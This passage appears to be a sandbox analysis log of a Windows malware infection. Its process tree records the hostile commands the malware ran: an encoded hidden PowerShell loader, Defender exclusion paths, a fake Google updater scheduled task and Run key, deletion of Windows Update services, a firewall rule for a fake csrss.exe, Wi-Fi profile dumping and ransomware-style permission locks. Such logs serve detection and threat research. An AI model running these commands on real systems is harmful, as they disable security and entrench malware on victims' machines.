GIATwBQAC8AZgBsADEARwB6AHQAVQBXAFoAdQBHAHUAWgB4AGYAVABpAGYAYgA2AFcAQwA1AG4AUgBxAEIAcQBZADIASABjAFQAWgBCAE8AbAAwAHUANQBCAEYAQwAyADYAVwAxAGIAbAA5ADIAWgBzAGwAawBqAC8AWABvAEIAbwBJAHkAcAAzAEoARQBQAGQAbQAvAGMAQgBMADEAMAAxAG8AWgBRAGYAUQB5AGMAeABQAGEAQwA1AHoAcABoAFUAdQBVAE4AcAA1AGYATABtAGQAeAB0AGgAdwA0AEkAdwBkADAAZQA0AHYAMgA1AFIASgBOAE4ASQB2ADQASABBAHQAagB3AFgAUABtAHkASwBTAGoAOQBqADYARQAwAFIARQBJAGIAUQBKAFkAMgBmAHYAcgBRAGUANgBpAHoAcAB2AFcAVwB4AGQANABsAHcAOQBkACsAdABZAGkARwArAFAAQgBWAEQATABrAFcAUwBxAFUAbwBtAFkAVAByAEQAMQBvAGsAQgArADAAegBwAFIAcABkAHQAVwB2AGMAQQBTAGQAcQBxAE4AawBuAEoAOQBqAGQAYwBKAEwAQgB2AHkASQAzAE8AKwBiAGoAeQAxAGwAYwBhAHMARwAwADcAZgBXAC8AcgBwAHYANgBUAHQAVgBCAFgAbgA5AHUAbgBjAGIAVgB2AEoAbwAzAEIAbwBIADYAaQBCAC8ASwBDAE8AWABrAHgAeQBGAFAAawB5AE0AegBDAFkAQQBTAEMAZgBTAHcARABkAG8AQQAvAFUAbwB0ADgAaQBNAE0AWAAyAFMAcwAwAGQAZwBoADkAaQBYADgASAAvAHQARQBMAHUAOQBCAFoAdQBxAEcAaAA1ADkAMwBWAEMANwBqAEQANwBNAEMAYgBhAE8ANwBEAHkAdQA4AEgAbwBTADgAdABvAHUAWQBtACsAZwBRAFgAMwB2AE8AdQBCAFgAWQBDADkAMgBTAHYAUwBnAEcAcABSAGoAcwBHAE8AZQBQAFcAKwA5AGQAZAA3AC8AeABOAHMAYgArAHIAdQBXAEIAcwArADYAOQBsAHMAagBkACsAagBsAFIAZQBSAFIANgBHAFkAWQBwAHQAVQBkAGEAcQBTADUAYwBSADYAUQA0ADUAUgB3AEMAVgBIAGsARAA2AG8AdAB6AGgATgBNADQAVQBVAEMAYgA1AGIAcQBHAGwASQBwAFQAWAAwACsAbgBFACsAVABGAEYANABHAHAAMwBuAE4AbgB3ADgATwBMAEMALwBhAFgAMQAxAEoAdwBoAE8AagA5AEgAbABzAFYANgBSADMANwA1AGIAZwBKAFoAOABjADIAcAB2AG0AQQBDAGMAaABpAHgAcgB5AC8AawBLAFcAWQBRAGIATAArADQANABNAEkAWAA1AC8AWQBOADAAMABPADQAaABjAFUANABPAFAAYwBJAEQAbAByAEoAYwBlADkAVQByADgAcQBxAHYAUgBjAHAAagA4AHIAMgBpAGQANwA5AGMASQBmAG8ASgAvAFIAZQBzAHoANwBSADkATwB2AHcAdABCAHUAYwBIAGoALwBZAEwANABWADgASQBQAG8AZgBtAGoAZwBjADgAOQB3AG8AQQBSAHcAWAB5AGcAKwBQAFIAQwArAFUAYgA4ADUAOABKADQAOQBvAGoAagBXAFkARwA4AGIAOAA0AGYAZgA0AFAAZgBsAE8AegAxAEMATgA1ADIAcgAxADcAKwBDAFEAZABYAFAAMQBqAHIAQwB3AEEAQQAnACcAKQApACkALABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAKQApACcAOwAkAHMALgBVAHMAZQBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQA9ACQAZgBhAGwAcwBlADsAJABzAC4AUgBlAGQAaQByAGUAYwB0AFMAdABhAG4AZABhAHIAZABPAHUAdABwAHUAdAA9ACQAdAByAHUAZQA7ACQAcwAuAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQA9ACcASABpAGQAZABlAG4AJwA7ACQAcwAuAEMAcgBlAGEAdABlAE4AbwBXAGkAbgBkAG8AdwA9ACQAdAByAHUAZQA7ACQAcAA9AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AFMAdABhAHIAdAAoACQAcwApADsA
3⤵
PID:2320

C:\Users\Admin\AppData\Local\Temp\Files\cp.exe
"C:\Users\Admin\AppData\Local\Temp\Files\cp.exe"
2⤵
PID:4156

C:\Users\Admin\AppData\Local\Temp\Files\client.exe
"C:\Users\Admin\AppData\Local\Temp\Files\client.exe"
2⤵
PID:1936

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 400 -ip 400
1⤵
PID:2368

C:\Windows\system32\findstr.exe
findstr /R /C:"[ ]:[ ]"
1⤵
PID:1968

C:\Windows\system32\netsh.exe
netsh wlan show profiles
1⤵
PID:2964

C:\Windows\system32\chcp.com
chcp 65001
1⤵
PID:2344

C:\Windows\system32\findstr.exe
findstr "SSID BSSID Signal"
1⤵
PID:2984

C:\Windows\system32\netsh.exe
netsh wlan show networks mode=bssid
1⤵
PID:1888

C:\Windows\system32\chcp.com
chcp 65001
1⤵
PID:3052

C:\Windows\system32\timeout.exe
timeout /t 3
1⤵
- Delays execution with timeout.exe
PID:1268

C:\Windows\system32\chcp.com
chcp 65001
1⤵
PID:3524

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
PID:3872

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
1⤵
PID:4204

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
2⤵
PID:1508

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
2⤵
PID:912

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
2⤵
PID:1116

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
2⤵
PID:3944

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#xfxixcb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
1⤵
PID:4516

C:\Windows\System32\sc.exe
sc stop bits
1⤵
- Launches sc.exe
PID:2380

C:\Windows\System32\sc.exe
sc stop dosvc
1⤵
- Launches sc.exe
PID:2608

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
1⤵
PID:2656

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
1⤵
PID:3732

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
1⤵
PID:3784

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
1⤵
PID:1620

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
1⤵
PID:2132

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#extmbyk#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
1⤵
PID:4672

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
2⤵
PID:2804

C:\Windows\System32\sc.exe
sc stop wuauserv
1⤵
- Launches sc.exe
PID:4704

C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
1⤵
- Launches sc.exe
PID:4184

C:\Windows\System32\sc.exe
sc stop UsoSvc
1⤵
- Launches sc.exe
PID:3152

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
1⤵
PID:2816

C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
1⤵
PID:1628

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 2988 -ip 2988
1⤵
PID:4064

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 1936 -ip 1936
1⤵
PID:4204

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 400 -p 5012 -ip 5012
1⤵
PID:3176

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
1⤵
- Modifies Windows Firewall
PID:3476

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 2472 -ip 2472
1⤵
PID:2996

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 668 -ip 668
1⤵
PID:2344

C:\Users\Admin\AppData\Local\Temp\51B5.exe
C:\Users\Admin\AppData\Local\Temp\51B5.exe
1⤵
- Suspicious use of WriteProcessMemory
PID:3324

C:\Users\Admin\AppData\Local\Temp\51B5.exe
C:\Users\Admin\AppData\Local\Temp\51B5.exe
2⤵
PID:3152

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
PID:3540

C:\Users\Admin\AppData\Roaming\gvrdtbj
C:\Users\Admin\AppData\Roaming\gvrdtbj
1⤵
PID:4240

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4240 -s 372
2⤵
- Program crash
PID:3000

C:\Users\Admin\AppData\Roaming\Microsoft\config\runtime.exe
C:\Users\Admin\AppData\Roaming\Microsoft\config\runtime.exe
1⤵
PID:224

C:\Users\Admin\AppData\Local\Temp\Microsoft\config\runtime.exe
C:\Users\Admin\AppData\Local\Temp\Microsoft\config\runtime.exe
1⤵
PID:3968

C:\Users\Admin\AppData\Local\Temp\67CE.exe
C:\Users\Admin\AppData\Local\Temp\67CE.exe
1⤵
PID:1708

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1708 -s 1044
2⤵
- Program crash
PID:1056

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1708 -s 1060
2⤵
- Program crash
PID:2356

C:\Windows\system32\regsvr32.exe
regsvr32 /s C:\Users\Admin\AppData\Local\Temp\7BA5.dll
1⤵
PID:1348

C:\Windows\SysWOW64\regsvr32.exe
/s C:\Users\Admin\AppData\Local\Temp\7BA5.dll
2⤵
PID:4984

C:\Users\Admin\AppData\Local\Microsoft\config\runtime.exe
C:\Users\Admin\AppData\Local\Microsoft\config\runtime.exe
1⤵
PID:1988

C:\Users\Admin\AppData\Local\Temp\82BB.exe
C:\Users\Admin\AppData\Local\Temp\82BB.exe
1⤵
PID:1344

C:\Users\Admin\AppData\Local\Temp\96B1.exe
C:\Users\Admin\AppData\Local\Temp\96B1.exe
1⤵
PID:4468

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4468 -s 244
2⤵
- Program crash
PID:2220

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4468 -ip 4468
1⤵
PID:2928

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#xfxixcb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
1⤵
PID:3400

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
1⤵
PID:4188

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
2⤵
PID:2928

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
2⤵
PID:4228

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
2⤵
PID:4800

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
2⤵
PID:4508

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
1⤵
PID:3712

C:\Windows\System32\sc.exe
sc stop UsoSvc
2⤵
- Launches sc.exe
PID:3832

C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
2⤵
- Launches sc.exe
PID:2732

C:\Windows\System32\sc.exe
sc stop wuauserv
2⤵
- Launches sc.exe
PID:788

C:\Windows\System32\sc.exe
sc stop bits
2⤵
- Launches sc.exe
PID:3420

C:\Windows\System32\sc.exe
sc stop dosvc
2⤵
- Launches sc.exe
PID:3892

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
2⤵
PID:2632

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
2⤵
PID:2636

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
2⤵
PID:1504

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
2⤵
PID:5272

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
2⤵
PID:5376

C:\Users\Admin\AppData\Local\Temp\AA79.exe
C:\Users\Admin\AppData\Local\Temp\AA79.exe
1⤵
PID:3476

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3476 -s 392
2⤵
- Program crash
PID:4336

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3476 -s 408
2⤵
- Program crash
PID:596

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3476 -s 412
2⤵
- Program crash
PID:2368

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3476 -s 696
2⤵
- Program crash
PID:5188

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3476 -s 704
2⤵
- Program crash
PID:5444

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3476 -s 704
2⤵
- Program crash
PID:5628

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3476 -s 704
2⤵
- Program crash
PID:6136

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3476 -s 760
2⤵
- Program crash
PID:5696

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
2⤵
PID:5316

C:\Users\Admin\AppData\Local\Temp\AA79.exe
"C:\Users\Admin\AppData\Local\Temp\AA79.exe"
2⤵
PID:3680

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3680 -s 364
3⤵
- Program crash
PID:5776

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3680 -s 192
3⤵
- Program crash
PID:5464

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3680 -s 380
3⤵
- Program crash
PID:4732

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3680 -s 640
3⤵
- Program crash
PID:5348

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3680 -s 708
3⤵
- Program crash
PID:5736

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3680 -s 708
3⤵
- Program crash
PID:5460

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3680 -s 736
3⤵
- Program crash
PID:4820

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3680 -s 760
3⤵
- Program crash
PID:3344

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3680 -s 780
3⤵
- Program crash
PID:4604

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
3⤵
PID:4592

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3680 -s 880
3⤵
- Program crash
PID:3516

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 1708 -ip 1708
1⤵
PID:2712

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 380 -p 1708 -ip 1708
1⤵
PID:1844

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 3476 -ip 3476
1⤵
PID:2344

C:\Users\Admin\AppData\Local\Temp\B9BC.exe
C:\Users\Admin\AppData\Local\Temp\B9BC.exe
1⤵
PID:4668

C:\Users\Admin\AppData\Local\Temp\B9BC.exe
C:\Users\Admin\AppData\Local\Temp\B9BC.exe
2⤵
PID:4932

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Local\d906a0f8-722c-4cd1-9788-f0f3ad47a7f9" /deny *S-1-1-0:(OI)(CI)(DE,DC)
3⤵
- Modifies file permissions
PID:5260

C:\Users\Admin\AppData\Local\Temp\B9BC.exe
"C:\Users\Admin\AppData\Local\Temp\B9BC.exe" --Admin IsNotAutoStart IsNotTask
3⤵
PID:5564

C:\Users\Admin\AppData\Local\Temp\B9BC.exe
"C:\Users\Admin\AppData\Local\Temp\B9BC.exe" --Admin IsNotAutoStart IsNotTask
4⤵
PID:5840

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5840 -s 600
5⤵
- Program crash
PID:5740

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 3476 -ip 3476
1⤵
PID:3512

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 2036 -ip 2036
1⤵
PID:1028

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 3476 -ip 3476
1⤵
PID:4464

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 4240 -ip 4240
1⤵
PID:4900

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 3476 -ip 3476
1⤵
PID:2632

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 3476 -ip 3476
1⤵
PID:5360

C:\Users\Admin\AppData\Local\Temp\EC37.exe
C:\Users\Admin\AppData\Local\Temp\EC37.exe
1⤵
PID:5556

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
2⤵
PID:5888

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5888 -s 1088
3⤵
- Program crash
PID:5384

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5888 -s 1104
3⤵
- Program crash
PID:5700

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 3476 -ip 3476
1⤵
PID:5596

C:\Users\Admin\AppData\Local\Temp\F1A6.exe
C:\Users\Admin\AppData\Local\Temp\F1A6.exe
1⤵
PID:5728

C:\Users\Admin\AppData\Local\Temp\is-2U0SQ.tmp\F1A6.tmp
"C:\Users\Admin\AppData\Local\Temp\is-2U0SQ.tmp\F1A6.tmp" /SL5="$80260,7878473,54272,C:\Users\Admin\AppData\Local\Temp\F1A6.exe"
2⤵
PID:6068

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 3476 -ip 3476
1⤵
PID:5904

C:\Users\Admin\AppData\Local\Temp\F6E7.exe
C:\Users\Admin\AppData\Local\Temp\F6E7.exe
1⤵
PID:5956

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
2⤵
PID:5300

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 3476 -ip 3476
1⤵
PID:5232

C:\Users\Admin\AppData\Local\Temp\3F8.exe
C:\Users\Admin\AppData\Local\Temp\3F8.exe
1⤵
PID:32

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 32 -s 372
2⤵
- Program crash
PID:5836

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 32 -ip 32
1⤵
PID:5596

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe pxpxvzslvmqtfph
1⤵
PID:5584

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
1⤵
PID:5936

C:\Windows\System32\Wbem\WMIC.exe
wmic PATH Win32_VideoController GET Name, VideoProcessor
2⤵
- Detects videocard installed
PID:5244

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
1⤵
PID:5604

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 2052 -ip 2052
1⤵
PID:5648

C:\ProgramData\wikombernizc\reakuqnanrkn.exe
C:\ProgramData\wikombernizc\reakuqnanrkn.exe
1⤵
PID:1092

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
2⤵
PID:5556

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe jgqccdbbxrzbdlfm 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPpZDYkQjcS/S/TS19hCmaZe7ZXiwOLhA74FQzXCOhDuCEgX6WVRJena9L8fAOb/OCpbdBtftU9QMBxG8aHan0UHttTlDXmg8zTJWEzz1jyzM08ycWZiYcc5uJhds9Rh8+fDvfznlHAMreIYNxYX5k9xJHAc4B0ozcm5wxfAVR1NkkPB2hskLA90oq6EEwunLM+cHugrCZPmAL+xjChc1L0WUYPKljZ7G2hVhhzqEtgfjve5jiLrrwjfPxGeeAf9vve0gqrSPFO0K58xxNJ8ClGMYA3jdfqtywTWLARpI3q8mmFmhW90pU5VNfoa01PrEPOLs5r8ABfO582XBZtlugNpAIuxABxOKWLf8XQtXZvoQ7dHNPMO3GgNUOP3U0XxrRiFOF/vB7jsNiVJkb1bI5v5nt59vi2Czwj87T9ujtAUxaRW+5V3BDnzrgkctEMZcXBV724S22jgwV6IzKvy6UKGJnVaM3eKyvceEhYeYhPyF7ZZaH7hc6eH/4/zT7gy/FOEOKoQlj9wOdYItup8djwg3zNzf9whNSzJ/f9PwHpnsQ==
1⤵
PID:6044

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 5840 -ip 5840
1⤵
PID:5900

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 5888 -ip 5888
1⤵
PID:2016

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 684 -p 5888 -ip 5888
1⤵
PID:4412

C:\Users\Admin\AppData\Local\Temp\8EC4.exe
C:\Users\Admin\AppData\Local\Temp\8EC4.exe
1⤵
PID:5156

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5156 -s 1044
2⤵
- Program crash
PID:6120

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5156 -s 1036
2⤵
- Program crash
PID:5544

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 692 -p 5888 -ip 5888
1⤵
PID:5480

C:\Users\Admin\AppData\Local\Temp\9B68.exe
C:\Users\Admin\AppData\Local\Temp\9B68.exe
1⤵
PID:4484

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 716 -p 5156 -ip 5156
1⤵
PID:4728

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 736 -p 5156 -ip 5156
1⤵
PID:5912

C:\Windows\explorer.exe
explorer.exe
1⤵
PID:4684

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 5408 -ip 5408
1⤵
PID:5432

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 3680 -ip 3680
1⤵
PID:1016

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 3680 -ip 3680
1⤵
PID:5560

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 708 -p 3680 -ip 3680
1⤵
PID:4132

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 708 -p 3680 -ip 3680
1⤵
PID:1064

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 684 -p 3680 -ip 3680
1⤵
PID:5436

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 668 -p 3680 -ip 3680
1⤵
PID:5328

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 676 -p 3680 -ip 3680
1⤵
PID:3804

